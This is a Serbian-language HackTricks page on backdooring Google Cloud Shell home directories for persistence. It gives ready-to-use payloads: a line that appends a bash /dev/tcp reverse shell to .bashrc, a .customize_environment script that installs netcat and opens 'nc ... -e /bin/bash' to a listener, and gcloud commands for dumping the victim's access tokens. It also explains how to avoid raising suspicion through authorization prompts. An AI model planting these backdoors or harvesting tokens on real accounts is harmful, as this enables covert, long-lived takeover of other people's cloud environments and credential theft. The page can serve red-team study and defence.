GCP - Cloud Shell Persistence

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Cloud Shell

Za više informacija pogledajte:

pageGCP - Cloud Shell Enum

Persistentna Zadnja Vrata

Google Cloud Shell pruža vam pristup komandnoj liniji za vaše cloud resurse direktno iz vašeg pregledača bez dodatnih troškova.

Možete pristupiti Google-ovom Cloud Shell-u sa web konzole ili pokretanjem gcloud cloud-shell ssh.

Ova konzola ima neke zanimljive mogućnosti za napadače:

  1. Svaki Google korisnik sa pristupom Google Cloud-u ima pristup potpuno autentifikovanom Cloud Shell instanci (Servisni nalozi mogu, čak i ako su Vlasnici organizacije).

  2. Pomenuta instanca će zadržati svoj matični direktorijum najmanje 120 dana ako nema aktivnosti.

  3. Ne postoji mogućnost za organizaciju da prati aktivnost te instance.

To u osnovi znači da napadač može postaviti zadnja vrata u matičnom direktorijumu korisnika i sve dok se korisnik povezuje sa GC Shell-om svakih 120 dana barem, zadnja vrata će preživeti i napadač će dobiti shell svaki put kada se pokrene samo radeći:

echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc

U home fascikli postoji još jedan fajl pod nazivom .customize_environment koji će se izvršiti svaki put kada korisnik pristupi cloud shell-u (kao u prethodnoj tehnici). Samo ubacite prethodnu backdoor ili neku sličnu kako biste održali postojanost dok god korisnik "često" koristi cloud shell:

#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash

Važno je napomenuti da će se prvi put kada se izvrši radnja koja zahteva autentifikaciju, pojaviti prozor za autorizaciju u korisnikovom pregledaču. Ovaj prozor mora biti prihvaćen pre nego što se komanda može izvršiti. Ako se pojavi neočekivani prozor, to bi moglo izazvati sumnju i potencijalno ugroziti korišćenu metodu upornosti.

Ovo je prozor koji se pojavljuje prilikom izvršavanja gcloud projects list iz cloud shell-a (kao napadač) viđen u korisničkoj sesiji pregledača:

Međutim, ako je korisnik aktivno koristio cloud shell, prozor za autorizaciju se neće pojaviti i možete prikupiti token korisnika sa:

gcloud auth print-access-token
gcloud auth application-default print-access-token

Kako se uspostavlja SSH veza

U osnovi, koriste se ove 3 API poziva:

Međutim, možete pronaći dodatne informacije na https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key

Reference

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated